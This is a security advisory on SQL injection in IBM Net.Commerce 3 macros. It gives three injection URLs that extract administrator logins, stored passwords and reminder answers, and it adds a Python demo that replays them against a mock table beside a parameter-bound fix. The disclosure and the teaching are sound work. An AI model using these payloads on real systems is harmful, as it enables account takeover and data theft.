COMMAND
NetCommerce
SYSTEMS AFFECTED
IBM NetCommerce 3 (others?)
PROBLEM
Rudi Carell found the following. He found a couple of serious
security holes in IBM's so-called "Net.Commerce" product, which
appears to be a mixture of WebSphere, Net.Data, servlets, JSPs and
DB2.
Besides the well-known WebSphere bugs (file disclosure and
default admin passwords), the most dangerous bugs result from the
complete lack of input validation in Net.Commerce's Net.Data
"macros".
By crafting malformed HTTP requests (SQL injection through a macro
parameter) it is possible to extract "any" information from the
Net.Commerce database.
Combining this method with other default Net.Commerce
functionality (PasswordReset, for example) it is possible to take
over the so-called "store manager" or "site manager" accounts.
Once you are an NC administrator you are allowed to use all the
admin tools. At this point you are able to upload and download
files, issue operating-system commands, or run any query as the
very highly privileged DB2INST1 account. This can lead to a
take-over of the whole system. Many default macros are vulnerable
to this (classic :-) sort of attack.
A few examples:
1) "How to find administrator accounts" (shopper type 'A')
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
2) "Passwords (encrypted)" (the shlpswd column)
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
3) "Password reminders" (the shchaans column)
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
Of course "orderdspc.d2w" is not the only vulnerable macro; it is
just an example. Casting between different data types is possible
(read the DB2 manual pages), so the injected SELECT can be made to
match the column types of the original query. It should also be
possible (not verified) to query other databases.
This has been confirmed on Net.Commerce 3.1.2.
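To make the injection pattern concrete, here is an added example that is
not part of the advisory and is not Net.Commerce or Net.Data code. It
replays the three request URLs above against an in-memory SQLite
database with a constructed stand-in for the shopper table (the column
names shlogid, shlpswd, shchaans and shshtyp are taken from the
advisory; the orders table, its mestname/total columns and all row data
are assumptions), once through a function that splices order_rn into
its SQL the way the vulnerable macro does, and once through a hardened
version that type-checks and binds the parameter.

```python
import re
import sqlite3
import urllib.parse

# The three request URLs quoted in the advisory, kept verbatim.
ADVISORY_URLS = {
    "admins": "http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';",
    "password": "http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';",
    "reminder": "http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';",
}

# Constructed stand-in schema (not the real Net.Commerce schema). The
# shopper columns follow the names used in the advisory; the orders
# table, its columns and every row are assumptions for this demo.
SCHEMA = """
CREATE TABLE shopper (
    shlogid  TEXT,  -- login id
    shlpswd  TEXT,  -- stored (encrypted) password
    shchaans TEXT,  -- challenge answer used by PasswordReset
    shshtyp  TEXT   -- shopper type; 'A' = administrator, per the advisory
);
CREATE TABLE orders (
    order_rn INTEGER,  -- order reference number taken from the URL
    mestname TEXT,     -- store name shown on the order display page
    total    INTEGER
);
INSERT INTO shopper VALUES ('ncadmin', 'ENCRYPTED-ncadmin', 'blue',  'A');
INSERT INTO shopper VALUES ('alice',   'ENCRYPTED-alice',   'rover', 'S');
INSERT INTO orders  VALUES (1001, 'Demo Store', 42);
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def order_rn_from_url(url):
    """Recover order_rn as the macro sees it after URL decoding
    ('+' -> space, %3d -> '='); the trailing ';' is dropped."""
    query = urllib.parse.urlsplit(url).query
    raw = query.split("order_rn=", 1)[1]
    return urllib.parse.unquote_plus(raw).rstrip(";")


def order_display_vulnerable(conn, order_rn):
    """Models a macro that splices the raw parameter into its SQL.
    A UNION in the parameter becomes part of the query."""
    sql = "SELECT mestname, total FROM orders WHERE order_rn = " + order_rn
    return [row[0] for row in conn.execute(sql)]


def order_display_fixed(conn, order_rn):
    """Type-check the parameter, then bind it; the injected SELECT
    never reaches the SQL parser."""
    if not re.fullmatch(r"[0-9]{1,10}", order_rn):
        raise ValueError("order_rn must be a number")
    sql = "SELECT mestname, total FROM orders WHERE order_rn = ?"
    return [row[0] for row in conn.execute(sql, (int(order_rn),))]


def demo():
    """Replay the advisory's three payloads; return what each leaks and
    whether the hardened function rejects the first one."""
    conn = connect()
    leaked = {name: order_display_vulnerable(conn, order_rn_from_url(url))
              for name, url in ADVISORY_URLS.items()}
    try:
        order_display_fixed(conn, order_rn_from_url(ADVISORY_URLS["admins"]))
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    for name, rows in leaked.items():
        print(f"{name}: {rows}")
    print("fixed macro rejected the payload:", blocked)
```

The vulnerable function hands back the administrator login, the stored
password and the reminder answer in the place where the store name
would normally be rendered, which is exactly how the report page leaks
them. The hardened version rejects the payload before any SQL is built.
On the real product the fix belongs in the macro or the Net.Data layer;
this Python only models how the query is constructed.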
SOLUTION
Nothing yet.